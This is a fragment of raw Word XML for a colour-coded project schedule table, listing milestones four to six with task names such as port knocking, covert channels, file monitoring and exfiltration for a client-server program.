                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Server - Data Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="A64D79" w:fill="A64D7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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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nil"/>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nil"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="EAD1DC" w:fill="EAD1DC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Server - Covert Channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="A64D79" w:fill="A64D7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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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nil"/>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nil"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="EAD1DC" w:fill="EAD1D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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFF2CC" w:fill="FFF2CC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestone #4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Client - Port Knocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="F1C232" w:fill="F1C232"/>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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="F1C232" w:fill="F1C232"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFF2CC" w:fill="FFF2CC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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Server - Port Knocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="F1C232" w:fill="F1C232"/>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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="F1C232" w:fill="F1C232"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFF2CC" w:fill="FFF2CC"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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xml:space="preserve">Client - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="F1C232" w:fill="F1C232"/>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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="F1C232" w:fill="F1C232"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFF2CC" w:fill="FFF2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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestone #5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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Server - File Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CC4125" w:fill="CC4125"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="CC4125" w:fill="CC4125"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="E6B8AF" w:fill="E6B8AF"/>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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E9"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestone #6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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Server - Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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r>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E9"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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Client - Parse Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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886" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9D2E9" w:fill="D9D2E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D9D2E9" w:fill="D9D2E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nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="674EA7" w:fill="674EA7"/>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41" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
